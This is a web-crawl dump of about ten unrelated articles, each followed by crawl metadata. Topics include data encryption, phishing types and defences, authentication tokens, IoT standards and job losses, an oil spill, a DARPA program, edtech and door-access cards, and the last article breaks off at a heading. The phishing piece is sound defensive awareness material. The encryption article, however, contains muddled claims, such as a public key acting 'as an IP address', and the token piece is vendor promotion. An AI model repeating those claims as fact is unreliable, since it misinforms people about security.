Unencrypted data is usually known as plain text, while encrypted data is called ciphertext.
Recently, modern encryption algorithms have replaced outdated data encryption standards (DES) in playing an important role in IT system security. Let’s discuss the importance of data encryption in better detail.
Data encryption is essential to prioritize key security initiations such as integrity, authentication, and non-repudiation. Firstly, integrity ensures honest communication by checking that the message’s contents remain the same.
On the other hand, authentication verifies the origin of the message. Lastly, non-repudiation ensures zero denial on the sender’s part when sending the message.
Overall, it’s good to encrypt your data, even on a smaller scale. If any of your devices are stolen, it’s easier for the thief to access your data. That is unless you make sure to encrypt your sensitive data.
Any organization that collects personally identifiable information (PII) from its customers must practice data encryption. Common forms of PII that are collected are names, social security numbers, birthdates, and financial information.
If a customer’s personal information is leaked or stolen, then it'll be your company’s legal status and reputation on the line.
Data encryption utilizes mathematical algorithms to scramble your data in the form of messages. As a result, only users with the cipher or key from the sender will be able to access that message.
There are two main types of data encryptions:
Public-key encryption is another name for asymmetric encryption. Asymmetric messages secure your messages and any data exchanged between two parties. Therefore, users of all messaging platforms and email services have one public key and one private key.
While the public key works as an IP address to protect your data, the private key further encrypts the data. So unless the hacker has access to your private key, they’ll never be able to access your messages.
Symmetric encryption secures your data with a private key, while asymmetric encryption combines public and private keys. The Advanced Encryption Standard (AES) is one form of symmetric encryption which scrambles hexadecimal data multiple times. This US government standard of data encryption uses 128, 192, and 256-bit keys to access the data.
However, users can also replace these keys with passwords, making them the only way to access the data. This is why you must ensure your password is strong and unbreachable.
Aside from symmetric and asymmetric encryption, there are more ways to categorize data encryption. Here are the three most common examples of data encryption:
With individual file encryption, you can choose to encrypt only the specific items you want. This type of encryption works best if you only have a few critical files on your device you want to encrypt. After all, selected encryption is better than having no encryption.
If you want to encrypt your computer entirely, it’s best to opt for full-disk or whole-disk encryption. In this case, you won’t have to save your sensitive data in a particular place on the disk, making it transparent.
Whole-disk encryption ensures every file on your device is encrypted. As a result, you’ll have to enter an encryption passcode whenever you power on your computer. Then, you’ll be able to access your files usually.
Lastly, you can choose volume encryption, in which your computer creates a container that’s already fully encrypted. Then, you can simply move your important files and folders to that folder to protect them.
Specific industry standards govern the usage of data encryption algorithms in organizations. Here are two of the most important standards of data encryption that you should know of.
CC is not technically an encryption standard. Instead, it’s a set of international guidelines to ensure that the security of a product holds up under tests. However, CC security standards are starting to include data encryption as a necessity as of late.
The FIPS adheres to the US Federal Information Security Management Act (FISMA) for the US government’s use. As a result, almost all government agencies in the US require this standard of data encryption.
There’s no doubt that data encryption can be pretty pricey, but a data breach will cost you even more. For example, full-disk encryption costs about $235, but this price can rise if you lose your security key.
Here are a few tips to keep in mind while performing data encryption:
Now that you’re all aware of data encryption, you’re all set to avail its benefits. Data encryption is one of the essential parts of the data security world.
If you want to learn more about data encryption, contact Accountable HQ today. We are a risk & compliance software-as-a-service (SaaS) company that provides information sources on data security, data privacy legislation, risk management, and other cybersecurity-related issues. | <urn:uuid:1afaf082-69de-4956-a7cf-769d0e61b950> | CC-MAIN-2022-40 | https://www.accountablehq.com/page/data-encryption | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.37/warc/CC-MAIN-20220930212504-20221001002504-00761.warc.gz | en | 0.909277 | 1,221 | 3.296875 | 3 |
Space is big. REALLY big. So big, in fact, that we measure distance by the speed that light itself travels in one year. Our closest neighboring star, Alpha Centauri, is 4.3 light years away. That’s 25 trillion miles! Despite this, scientists are already coming up with plans to cross this insane distance. Are you ready for the most epic road trip in the universe?
Join the Komando Community
Get even more know-how in the Komando Community! Here, you can enjoy The Kim Komando Show on your schedule, read Kim's eBooks for free, ask your tech questions in the Forum — and so much more. | <urn:uuid:ed8ad412-0d49-4024-bd43-918d86b5bbd2> | CC-MAIN-2022-40 | https://www.komando.com/video/komando-picks/how-will-we-get-to-alpha-centauri/681971/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.37/warc/CC-MAIN-20220930212504-20221001002504-00761.warc.gz | en | 0.926585 | 138 | 2.828125 | 3 |
The Internet of Things (IoT) may be introducing many new possibilities into our work and domestic lives, but there are fears it could lead to mass layoffs in the future.
A report published last week by consulting firm Zinnov claims that IoT will impact a staggering 120,000 jobs in India by 2021, although up to 94,000 redundancies could be made.
Meanwhile, only 25,000 jobs will be created within the next few years. The main cause of this will be increased automation, whereby humans are replaced by technologies capable of handling the same job.
IoT causes mass job losses
Connected chips, gadgets and machinery will have detrimental effects in areas such as office work, support and maintenance, it’s thought. Only more skilled employees – such as network engineers and robotics coordinators – will keep their jobs.
The connected tech market will consist of 5 percent of the global technology industry and will make $15,000 within the next few years, according to Nasscom.
India currently contributes $1.6 billion to the global IoT industry, says Zinnov, but this will reach $7.3 billion by 2021. The country’s corporate sector is driving the industry, making up 80 percent of the country’s overall contribution.
The government only funds 20 percent of the domestic IoT market, perhaps due to a lack of understanding and interest in the area. Firms, on the other hand, are looking for ways to save money and streamline their operations.
Automation to affect whole tech sector
Recently, US tech analyst HfS Research said the technology sector in India will lose more than 4 million jobs by 2021. This, it claimed, will come down to companies automating low-skilled jobs.
Hardik Tiwari, engagement lead at Zinnov, told the Economic Times that thousands of jobs will be affected in India. However, countries like the UK and US will also be impacted in similar ways.
“Internet-of-things technology will impact 120,000 jobs in the country by 2021. 94,000 jobs will be eliminated, and 25,000 jobs will be created in the five-year period,” he said.
Tiwari explained that service companies are reaching out to IoT companies with unique products, something that’ll help the Indian IoT develop into a global leader.
“There is a lot of demand from service providers for niche internet-for-things players with intellectual property and platforms. This will help increase the industry’s market share.”
Automation needs care
Nitin Rakesh, CEO and president of global IT and business solutions provider Syntel, told Internet of Business that companies experimenting with automation need to ensure they have “robust” strategies in place.
“A robust and holistic approach to enterprise automation provides a central backbone that empowers companies to modernise so they can survive and thrive in the two-speed world and harness the capabilities of the new IoT paradigm.,” he said.
“As the IoT tidal wave gathers strength, a gap is emerging between companies reliant on ageing legacy systems and the growing demand for digital connectivity by consumers. This digital disconnect will create unprecedented challenges for companies across a many sectors, including banking, insurance, healthcare and manufacturing.
“In order for companies to become IoT ready, they must find a way to unlock the data within their legacy systems whilst upgrading to more modern digital platforms that support the constant stream of real-time data that IoT-connected devices generate.” | <urn:uuid:c4409f0d-5c7f-4723-92f4-7eb8f52ba2bc> | CC-MAIN-2022-40 | https://internetofbusiness.com/iot-result-94000-job-losses/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337287.87/warc/CC-MAIN-20221002052710-20221002082710-00761.warc.gz | en | 0.941544 | 734 | 2.671875 | 3 |
Proving your identity in order to authenticate yourself and gain access to some kind of system is more of a challenge than most people realize. This process has to be designed so that on one hand it’s as easy as possible for the user of the system to gain access, while on the other it’s as difficult as possible for someone who isn’t authorized to gain access. We’ll look at how tokens fit into the authentication process, as well as the different types of tokens – including hard tokens, soft tokens, and everything in between.
A simple password doesn’t cut it for most systems, especially ones with higher risks or sensitivity attached to them. One of the most effective ways of ensuring authentication is with “Multi-Factor Authentication”, or MFA.
There are 3 independent factors classes for authentication:
1) Something you “know”: a password or PIN, or an answer to a question
2) Something you “have”: a token, credit card or mobile device
3) Something you “are”: biometric data, such as fingerprints, or behavioral data such as keystrokes
With multi-factor authentication, a user must prove at least 2 of these independent factors.
This introduces the concept of a token; something that is used to prove 1 of the 2 independent factors required above. Authentication tokens are generally divided into 2 groups: a Hard token, and a Soft token. Hard tokens (Hardware token = Hard Token) are physical devices used to gain access to an electronically restricted resource. Soft tokens (Software token = Soft token) are just that; authentication tokens that are not physically tangible, but exist as software on common devices (for example computers or phones).
Hard Tokens Have Done Their Bit
When it comes to security tokens, most people think of hardware tokens – such as smart cards, Bluetooth tokens, one-time password (OTP) keyfobs, or USB keys. The most common one, RSA SecureID, has been in the market since 2002 (yes, that’s already 15 years) a new contender in this field are Universal 2nd Factors (U2F), utilizing a new standard in authentication Fast Identity On-Line (FIDO)
Hard tokens have a number of challenges: They’re relatively expensive, easy to lose, and their administration and maintenance often take a heavy toll on IT departments. They’re also vulnerable to theft, breach of codes, and man-in-the-middle attacks.
Soft Tokens: Where UX meets TCO
Software tokens have a number of advantages over hardware tokens. They can’t be lost, they can be automatically updated, the incremental cost for each additional token is negligible, and they can be distributed to users instantly, anywhere in the world.
Nowadays, instead of carrying around an extra piece of hardware, and given the fact that everyone these days has smartphone, soft tokens have been incorporated into smartphones (usually in the form of an app).
In multiple recent reviews Gartner addressed the increased use of phone-as-a-token methods, noting in their Technology Insight for Phone-as-a-Token Authentication report that “authentication methods that co-opt users’ mobile phones as tokens are widely adopted”, and “by the end of 2019, 50% of enterprises using phone-as-a-token authentication will use mobile push in preference to other modes, compared with less than 10% today.” Gartner’s “Phone-as-a-Token: category relates to all kinds of mobile-based authentication, including soft tokens, OTP and push notification.
Interestingly, the report also warns that “security and risk management leaders must carefully evaluate them against trust and user experience needs, especially when the phone itself is the endpoint device.”
The Right Authentication Solution For You
Over the next 5 years, Gartner sees a move away from hard tokens, with some of the reasons for this move outlined above. Soft tokens, especially when incorporated into smartphones, are certainly where the industry is heading, but have their drawbacks especially from a security perspective.
For the highest levels of both ease and security, Secret Double Octopus offers its Password-free Authentication, Multi-Factor Authentication (MFA) through its mobile-based Octopus Authenticator, which leverages the power of secret sharing to enable authentication within enterprises that gives high assurance and is password-free.
Secret Double Octopus removes the nuisance of authentication – One-time-Password (OTP), SMS, and authentication tokens, while offering increased security – with no additional hardware involved.
Octopus Authenticator is the industry’s only solution to overcome the challenges inherent in the soft tokens available on the market today. With multi-route security made possible by the secret sharing scheme, Secret Double Octopus’ Octopus Authenticator offers an unobtrusive and frictionless user experience and the best level of security. | <urn:uuid:bd878a9b-4f6c-40a9-832e-68f9c4e25b8e> | CC-MAIN-2022-40 | https://doubleoctopus.com/blog/access-management/tokens-hard-soft-and-whats-in-between/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337421.33/warc/CC-MAIN-20221003133425-20221003163425-00761.warc.gz | en | 0.924512 | 1,035 | 3.140625 | 3 |
As web security improves, email security has become a bigger problem than ever. The overwhelming majority of malware attacks now come from email — as high as 89 percent, according to HP Wolf Security research. And with many employees getting multiple emails per day, it’s easy for spam emails to slip their notice.
Approximately 83 percent of organizations said they faced a successful phishing attempt in 2021, up from 57 percent in 2020. As phishing attacks become more prevalent and more successful, often serving as a gateway for further attacks like ransomware and advanced persistent threats (APTs), businesses need to prioritize protections against them. But in order to do so effectively, companies need to know more about the threat they’re facing. This guide breaks down the different types of phishing attacks and provides examples to help organizations better prepare their staff to deal with them.
- What is Phishing?
- Types of Phishing Attacks & Their Defenses
- Common Examples of Phishing Attacks
- What Can Help to Protect You from Phishing?
- Phishing Protection Doubles as Malware and Ransomware Protection
What is Phishing?
Phishing is a type of social engineering attack in which bad actors pose as a trustworthy entity via phone, email, or text message in order to steal personal information from the recipient. Attackers may try to get their victims to reveal their date of birth, social security number, credit card information, or account passwords. They may also try to trick the recipient into clicking on a malicious link that would download malware onto their computer, giving them access to sensitive information.
Types of Phishing Attacks & Their Defenses
There are several types of phishing attacks that businesses should be prepared for: spear phishing, whaling, clone phishing, vishing, and smishing.
Spear phishing attempts are targeted toward specific individuals or groups of individuals. They may include the recipient’s name, position, company, or other information that would set the potential victim at ease. The attacker may even claim they’re the recipient’s boss with an urgent request.
Messages like this tell the attacker whether an email address is active and if the recipient is likely to accept this initial email as legitimate. Notice the email address ends in @mail.ru instead of @eku.edu like a real university email address would. The attacker has taken all of the elements of the real Laurence’s email and spoofed it for their own purposes. If the attacker gets a response, they can execute the second part of their plan, whether it be to get additional information or deliver a malicious link.
Spear Phishing Defenses
Email security software can block many of these emails, but some will still slip through. Double-check the email address these emails come from as well as the reply address. If you’re on your computer, hover your mouse over any links to see where they’ll take you before clicking on them. With some mobile phones, you can hold down your finger on a link to see where it goes, although this is riskier than checking it from a computer. Never open any attachments without making sure the message is legitimate.
In addition to verifying the email address, check for grammatical errors that may indicate an attacker is looking for easy targets. While everyone makes mistakes in their emails occasionally, phishing attempts will have a higher number of errors than usual because they want to capture people that won’t question the attacker’s further actions.
If you can’t tell whether the message is real or not, contact the alleged sender through a different channel. Don’t reply to the email if it’s fraudulent or you’re unsure.
Also read: Zero-Click Attacks a Growing Threat
Whaling is similar to spear phishing, except that it targets high-level employees, like executives or directors. They typically have access to the most valuable information in a company, making them appealing targets for attackers. Bad actors can either sell the information they’re able to gather or hold it for ransom. Additionally, they may be able to manipulate these high-level employees into wiring large amounts of money into the attacker’s account.
Whaling protections are similar to those of spear phishing. Email protection software can help, but you’ll still need to know what to look for in the few that slip through. Slight changes in the email address, a different reply-to address, or a large number of grammatical errors can all indicate phishing.
Clone phishing, like spear phishing, is typically targeted at a small group of people because the attacker duplicates an email that the recipients have already received. For example, if the organization sends out an invitation to a company-wide event, the attacker might follow that up with an email that includes a “registration link” which really includes malware. Because the initial email was genuine, employees are more likely to lower their guard when they get the second email.
Clone Phishing Defenses
Clone phishing emails will attempt to spoof the email address of the initial sender, but there will either be slight differences or a different reply-to address. Before clicking on links in an email that you’re not completely certain is legitimate, hold your mouse over them to see the web address and double-check the sender name and email address and compare it against what you have in your contact list. If you’re still not sure, you can always contact the person via a channel other than email, like Slack or phone, to ask them about it. Do not reply to the email if it’s fraudulent.
Smishing is the text message version of phishing attacks. They may be targeted, like spear phishing, but they may also be more general, appearing to come from their bank or Amazon, for example. The SMS text message will prompt users to call a fraudulent number and provide sensitive information or click on a link that will download malware onto their device.
Words like “urgent” prompt recipients into fast action, so they’re more likely to make a mistake. But note the link here. Actual requests from the USPS would likely include usps.com in the link, but this one is just a string of letters and numbers, marking it as fraudulent.
As people become more familiar with phishing and smishing attempts, attackers get better about disguising their links. Nowadays, instead of the random string of letters and numbers pictured above, you’re more likely to get smishing attempts that include links to ama.zon.com or vvalmart.com (note the double v in place of a w).
The best way to guard against phishing attacks is to examine the message carefully before taking action. And if you’re not sure whether it’s legitimate, call the company using the number from their actual website or on the back of your credit or debit card in the case of bank-related smishing attempts. If you determine the text message is illegitimate, just delete it and block the number. Don’t reply to it, as you’ll confirm the number is active and will likely get more like it.
Vishing is phishing that is executed via telephone, often coming from spoofed phone numbers. The attacker typically pretends to be someone from a legitimate business, like a bank or retailer, in an attempt to get personally identifiable information from the recipient.
Many wireless phone providers have introduced spam protections to keep their customers from falling victim to vishing scams. While some will not even allow the phone to ring, lowering the chances that the recipient will actually answer the call, others will simply mark the call as potential spam, leaving the choice in the hands of the recipient.
You can also register your number on the federal Do Not Call list, but it doesn’t seem to have any actual effect on the number of scam calls received. Overall, unless you’re expecting a call from someone whose number you don’t have saved, it’s best to ignore calls from numbers you don’t know, trusting that callers with important information will leave a voicemail. If the caller does turn out to be spam, block the number, so they can’t use it to contact you again.
Common Examples of Phishing Attacks
Here are a few real-life examples of phishing attacks that you might run into.
Amazon Phishing Email
Millions of people use Amazon regularly, so it’s no surprise that attackers use their name and logo for phishing attempts. In the above example, the attacker uses the Amazon logo to legitimize the request.
However, notice how the sender uses a comma instead of a period at the end of the first sentence and includes an extra space between “in” and “your.” These grammatical errors serve to identify the easiest targets because if the email recipient doesn’t question those, they’re less likely to question any other mistakes the attacker makes. And if you were able to hover over either of the links, chances are you wouldn’t see an actual Amazon address. Other large vendors, like Walmart and Target, may have their email addresses spoofed as well.
Chase Phishing Text Message
Many attackers use phishing attempts that appear to be from the recipient’s bank because they’re more likely to respond quickly when money is involved. The above example tells the customer their account has been locked, so they’ll call the number to fix the problem. If that happens, they can then get the recipient to provide the information they want.
Some indicators that this is fake is the lack of spaces between “Chase” and “bank” and after the period. Additionally, there is a zero in the word “LOCKED” instead of a capital O. Chase users aren’t the only targets of this type of attack. Most banks and even Paypal face similar spoofing occurrences.
Car Warranty Phishing Phone Call
Today, you’d be hard-pressed to find someone who hasn’t gotten a spam call from a recorded voice telling them their car warranty is expired or about to expire. This is a common phishing attack that attempts to manipulate people into giving over sensitive information like their credit card number, name, address, and social security number. Additionally, if the recipient answers the call, the attacker knows it’s active and they can sell it to other attackers.
Similar examples of this scam are calls about student loan debt, saying that the IRS has put a warrant out for your arrest, or that there has been fraud on your credit card account. The tells are different for each of these, but typically, they won’t provide any specific information that would verify that the call is actually for you.
What Can Help to Protect You from Phishing?
Attention to detail will help you the most when protecting yourself and your business against phishing attempts, but there are other things you can do to lessen the number of attacks you’re subjected to.
Email Security Software
Email security software can block known malicious domains that other users have marked as spam in the past. Some also use AI and ML to identify patterns that suggest spam or phishing attempts. With these tools in place, you’re less likely to get general phishing emails, meaning you can pay more attention to spear phishing attempts. Some of the top email protection tools include:
- Mimecast Secure Email Gateway
- Barracuda Spam Firewall
- Proofpoint Enterprise Protection
- ClearSwift Secure Email Gateway
Get the full list of our recommendations for the Top Secure Email Gateway Solutions.
Cybersecurity Awareness Training
Employees have to know what to look for before they can spot a phishing attempt, so providing cybersecurity awareness training is the best way to protect your business from a data breach. But it can’t just be a one-time thing. New threats are always emerging, so you need to hold regular training sessions to keep your employees up to date and the training fresh in their minds. Some of the best cybersecurity awareness programs come from:
- SANS Institute
Get the full list of the Best Cybersecurity Awareness Training for Employees to find the program that’s right for your business.
If your training program doesn’t include phishing simulators, you should consider it as an add-on. Phishing simulators give employees a safe space to test their knowledge of phishing attacks without risking personal or company information. They also send test emails to employees to see how well they can spot the signs of phishing. It also provides companies with an idea of their risk profile, showing them how many of their employees engaged in risky behaviors with the fake phishing attempt.
Some companies that offer phishing simulators include:
- Infosec IQ
- Simple Phishing Toolkit
Phishing Protection Doubles as Malware and Ransomware Protection
Phishing attempts are big problems on their own, but they can also serve as a gateway for attackers to introduce malware and ransomware, costing businesses thousands of dollars in remediation. If businesses can effectively block phishing attempts, they also protect themselves against further attacks, especially because it means your employees know what to look out for. Investing time and money in phishing protection can help organizations save both in the long run.
Read next: QR Codes: A Growing Security Problem | <urn:uuid:a0b98c19-72e0-4866-9525-414af3ef6898> | CC-MAIN-2022-40 | https://www.esecurityplanet.com/threats/phishing-attacks/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337421.33/warc/CC-MAIN-20221003133425-20221003163425-00761.warc.gz | en | 0.942364 | 2,859 | 2.953125 | 3 |
Imagine that there were three different varieties of Wi-Fi style connectivity. Whenever you ordered a new Wi-Fi device you would have to select the right option – which might not always be available. Only some hotspots would be accessible to you – those with the same technology as in your laptop. Some places, like planes, might offer multiple technologies but because of lack of spectrum this reduced the data rate for each. Others chose not to deploy Wi-Fi until the confusion over the preferred technology was over. Such a world would be much more annoying and much less productive than the one we currently inhabit.
This is exactly the world of unlicensed IoT – the machine equivalent of Wi-Fi connectivity. Technologies include Sigfox, LoRa, Ingenu, Telensa, Weightless and others. Devices from one are incompatible with others and they mostly compete for the same spectrum, often interfering with each other. Why do we put up with it?
Some claim that these technologies target different market segments – for example Sigfox targets the lowest-cost devices that only transmit data, while LoRa is for more complex devices that need to receive as well. But Wi-Fi covers a wide breadth of use cases with a single standard, as does cellular.
We do not have one cellular technology for the high-bandwidth gamer and a different one for the low-usage pensioner. It is invariably less expensive to have a single standard, able to meet the needs of most users, which can deliver economies of scale and encourage widespread deployment of infrastructure.
Others claim that the market is large enough for multiple technologies – but it is much smaller by value than cellular. Or that competition is needed between different technologies at this early stage of its evolution – but most standards evolve as lessons are learnt rather than compete.
These are arguments designed to perpetuate the status quo, rather than ones with substance. A quick glance at the current wireless connectivity we use throughout our lives shows that there are no exceptions to the rule that (1) we have a single preferred connectivity solution in each different space – eg Bluetooth, Wi-Fi and cellular – and (2) only open standards succeed. There are no reasons why IoT should be any different. And more fundamentally, there will not be widespread success of IoT connectivity until these conditions are met.
For our cell-phones we are used to wide-area connectivity being provided by mobile network operators (MNOs) using 3GPP cellular standards and local connectivity self-provided through Wi-Fi using IEEE standards under the auspices of the Wi-Fi Alliance. It seems likely that a very similar outcome will transpire for IoT.
Wide-area connectivity will come from MNOs deploying 3GPP standards, most likely NB-IoT. Local connectivity will come from an ETSI standard under the auspices of the Weightless SIG. Some devices will have dual-purpose chipsets, others will have perhaps only Weightless-certified connectivity – in the same way that some devices have dual cellular-Wi-Fi chipsets and others Wi-Fi only (but it is rare to have a cellular chipset that does not also have Wi-Fi connectivity).
While few would disagree with the prognosis of NB-IoT deployment, many might question the prediction of unlicensed deployment. After all, isn’t it the case that Sigfox and LoRa have significant deployments already? The answer is emphatically “no”. If we are to reach the predicted 50 billion devices in, say, a decade, then we need to deploy 13 million per day.
Sigfox have around 10 million users, less than a day’s worth of deployment. These are more akin to early trials than mass deployment. And this is exactly what would be predicted based on the observation that markets only succeed when there is a clear single open standard. (Sigfox are part of a process to develop a standard within ETSI so it is possible that they will find a route to become that open standard).
The situation of competing proprietary technologies can only be resolved through the wider industry getting together and collectively putting its weight behind a single unlicensed standard. The Weightless SIG is providing such a forum and welcomes membership from all those who wish to see this untenable situation resolved quickly in the interests of all who want to see IoT succeed. Or would you prefer the world of multiple incompatible Wi-Fi variants described above? | <urn:uuid:9cdb9823-9e74-4d93-829a-97a66dcf0959> | CC-MAIN-2022-40 | https://internetofbusiness.com/standards-iot-problem-sigfox/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337529.69/warc/CC-MAIN-20221004215917-20221005005917-00761.warc.gz | en | 0.955257 | 905 | 2.96875 | 3 |
Goleta, California — An oil slick stretched across 9 miles of coastal waters Thursday after a pipeline rupture spilled thousands of gallons of sticky, stinking crude just north of Santa Barbara. Crews are working around the clock to rake, skim and vacuum it up.
The coastline was the scene of a much larger spill in 1969 — the largest in U.S. waters at the time. Here are some things to know about the two spills:
VOLUME OF CRUDE
The 1969 blowout at a Union Oil Co. offshore platform dumped more than 3 million gallons of crude oil over a span of a month. Up to 30 miles of beaches were fouled.
Tuesday's pipeline break lasted about three hours. According to initial estimates, it spilled up to 105,000 gallons, with the majority of the oil remaining on land.
Up to 21,000 gallons reached the sea, early estimates show.
BIRDS, SEA LIFE
The 1969 spill killed 9,000 birds, 8.8 million barnacles, 30,000 mussels and 51,800 limpets, according to tallies by biology professor Michael Neushul of the University of California, Santa Barbara.
He and his students were unable to prove significant numbers of deaths among fish, whales, elephant seals, sea lions or plankton.
Tuesday's spill was mostly contained near one section of coastline at Refugio Beach. So far, there is no evidence of widespread harm to birds and sea life.
Other environmental impacts are still being assessed.
CALL TO ARMS
The 1969 disaster is credited with giving rise to the American environmental movement.
Groups like the Environmental Defense Center and Get Oil Out! formed in its aftermath.
That spill led to a prohibition on new offshore platforms in federal waters off California. But companies have used fracking and other techniques in an attempt to stimulate new production from old wells.
California has not issued a new lease for offshore oil drilling since 1968.
However, large offshore rigs still dot the horizon off the coast, pumping crude to shore. Small amounts of tar from natural seepage regularly show up on beaches.
Environmental groups used Tuesday's spill as a new opportunity to take a shot at fossil fuels and remind people of the area's notoriety with oil spills. | <urn:uuid:981ae144-db35-48fe-b52c-e2b9d443aa5c> | CC-MAIN-2022-40 | https://www.mbtmag.com/global/news/13214123/a-look-at-how-california-spill-compares-with-1969-disaster | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337529.69/warc/CC-MAIN-20221004215917-20221005005917-00761.warc.gz | en | 0.945191 | 472 | 3.296875 | 3 |
Tech developed under the program could help the Defense Department react to repressive actions in cyberspace.
The Defense Advanced Research Projects Agency is looking for innovative research concepts that can help foster an understanding of how authoritarian regimes control information.
For authoritarian regimes, maintaining control of information has always been imperative. But digital technologies are providing nations such as China—infamous for the surveillance of its own citizens—new tools for censorship.
DARPA, under a program called Measuring the Information Control Environment, or MICE, wants to develop artificial intelligence technology to “measure how digitally authoritarian regimes repress their populations at scale over the internet via censorship, blocking, or throttling,” according to a June 1 post on SAM.gov.
“MICE-developed technology will continuously and automatically update and feed into easily-understood dashboards in order to develop comprehensive, real-time ground truth understanding of how countries conduct domestic information control,” the post reads.
Right now, according to DARPA, censorship measurement techniques are insufficient because they aren’t comprehensive, persistent, and presentable. Under MICE, performers will build open-source prototypes in two phases with an eye toward addressing these deficiencies, according to a document outlining the program.
Such a capability would enable the Defense Department to bolster efforts to combat repression in cyberspace, according to the document. DARPA listed six topics proposals must address:
- What parts of the information environment they will target.
- Scope and granularity of measurement.
- Where and how they plan to collect information.
- How they will track changes to the information environment over time.
- Presentation for end users or analysts in easy-to-understand formats.
- How government agencies or non-government organizations interested in internet freedom can use the technology developed under MICE.
Proposals for MICE are due June 30, and awards will be made under the other transaction authority with a total combined award value for both project phases of up to $1 million. | <urn:uuid:0ea33684-5bc8-4e49-adab-5f5cc60e8cb1> | CC-MAIN-2022-40 | https://www.nextgov.com/emerging-tech/2021/06/darpa-calling-ai-proposals-measure-how-authoritarian-regimes-control-information/174442/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334987.39/warc/CC-MAIN-20220927033539-20220927063539-00161.warc.gz | en | 0.90627 | 416 | 2.546875 | 3 |
Education isn’t just pens and paper anymore. It’s becoming a place of interconnectivity and innovation. Now with the UN declaring that the Internet is a human right this further brings the whole world to the classroom.
Education is still one of the biggest things that American taxpayers give to and with the new 2012 budget over 4 billion dollars will be invested into bringing technology to the class room. Its no wonder many start-ups are looking towards the education market as prospectors looked towards San Francisco in 1849.
San Francisco has also always been the center of large venture capital investment and high tech innovation. Now the Coastal city in Northern California may also be the place where future education problems are solved. Places like The Kapor Center which work on helping technological innovation for the classroom. The center houses many different entities all of which work towards having a positive social impact and increasing access to educational opportunities. Kapor Capital working out of the Kapor Center helps to fund educational based start-ups.
Most of these start-ups (especially in the San Francisco area) are technology based. All of the small start-ups are looking for their small slice of the giant pie given to education in the US. Khan Academy is one such start up that was created out of need that turned into a business. The business its self helps children learn by using video’s posted on Youtube. Bill Gates has taken notice of the Khan Academy and invested 1.5 million into the Academy.
Youtube has given people from the world over access to inspiring lectures and motivational speeches (also Justin Beibers career). The next form of access, which is changing the face of connection between people, is smartphones and tablets. With more people expected to access the internet via a mobile device its no wonder the next leap forward in education will come from Silicon Valley. | <urn:uuid:5baef7db-29a4-460b-8ae9-d4b1b14f1a0c> | CC-MAIN-2022-40 | https://www.faronics.com/news/blog/the-next-classroom-in-a-room-or-on-the-web | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335254.72/warc/CC-MAIN-20220928113848-20220928143848-00161.warc.gz | en | 0.962063 | 373 | 2.75 | 3 |
How Door Access Credentials Work
Door access control systems use various credentials to unlock the door. Credentials can include physical cards that we carry, a PIN number we enter, or even the physical aspect of a person (biometrics such as fingerprint or facial recognition). This article compares the credentials that we carry. They are sometimes called keycards, prox cards, or smartcards.
The card or keyfob responds to an RFID signal from the door access reader and then provides the stored identification code. Each credential provides a unique identification number (ID number) to the door reader that identifies the card credential. There are several types of credentials. Older versions used Wiegand wires, magnetic strips, bar codes technology. Today we use contactless or RFID connections to the door readers. RFID cards are sometimes referred to as prox cards, smartcards, or mobile credentials (Bluetooth to the smartphone). There are various physical formats. For example, there are a thin card, thick card, or key fob format. Different credentials use unique data coding formats and frequency between the credential and the door reader. There are 125 kHz frequency, 13.56 MHz frequency credentials, and mobile Bluetooth credentials (Smartphone).
The Proximity type credentials (or cards) are passive, so they don’t have a battery. They rely on the power broadcast from the reader to turn on. The proximity (or “prox”) credentials use 125KHz frequency while the Smartcard or Mifare technology use 13.56 MHz. It is interesting to note that the industry defines the 125KHz version as a “Proximity card,” while the 15.6MHz cards are classified as “smartcards,” yet both types are contactless credentials that are activated when they are close to the reader (in proximity).
All the credentials have an embedded ID number that is read by the access control reader. The door readers are designed to “read” only certain types of credentials. Some door readers can read more than one type of credential, but you must be careful to select the compatible reader and credential.
There are other types of credentials, such as biometric credentials and PIN numbers. For a review of the security provided by various credentials, take a look at our article, “Comparison of Security Provided by Door Access Systems.”
HID Proximity Credentials
HID was established in 1991 as Hughes Identification Devices (HID). They have become a significant supplier of various credentials. Since they have a large market share, their credentials have become a pseudo standard for the door access control industry. They license their 13.56MHz iClass, MiFare, DESFire, and 125KHz Indala and Prox card technology. The result of the licensing increases the cost of these credentials.
Since the HID credentials are very popular, they can be read by many different door readers. The reader’s specifications have to indicate “HID compatible.” The readers tend to cost more because they have to pay a license fee to HID. There are other RFID credentials available.
HID offers different coding formats but mostly provide 26-bit coding. This coding includes room for facility codes and other information besides a specific ID number. When a 16-bit code is used for the ID, there are 65,535 ID combinations available.
When you order the cards, you can select what the card looks like, for example, the artwork and the material the card is made from (vinyl or PVC). You may want a thin card that fits in your wallet or one that is thick and has a slot for a lanyard. You can tell the manufacturer the starting ID number of the series, and whether or not you want the number on the label. You also have the opportunity to add a facility code.
Proprietary Proximity Credentials
Proprietary proximity credentials are very similar to the HID type. They both use the 125 kHz frequency. The only difference is the protocol used between the credential and the reader. Since the transport coding is unique to a manufacturer, it is essential to pair the credential with the manufacturer of the door reader. When you order these cards you have similar options as described above.
If you are installing new door readers, then it will cost less to use the proprietary credentials and associated readers. If you would like to be compatible with other buildings in your organization that use HID type credentials then select the HID type readers and credentials.
Mifare or Smartcard Credentials
These credentials operate at 13.56MHz and use 128-bit code that provides a dramatic increase in the number of unique card IDs available as well as encryption. The smartcard technology also offers additional security and capability. Besides ID information, the cards contain memory storage. The original MiFare cards were first used to keep track of transportation payments.
One important feature is data encryption between the credential and the door reader. This prevents hacking of the credentials. The encryption requires compatibility of the credential and door reader, so you can’t use an encrypted smartcard with any smartcard reader.
The MiFare card includes a number of bytes (8-bits) of data. There is encryption information, and data blocks included in the transmission. When you order these cards, you can specify similar options as described above. There is also an option for the amount of storage, but most door access control systems don’t make use of storage.
Mobile Smartphone Credentials
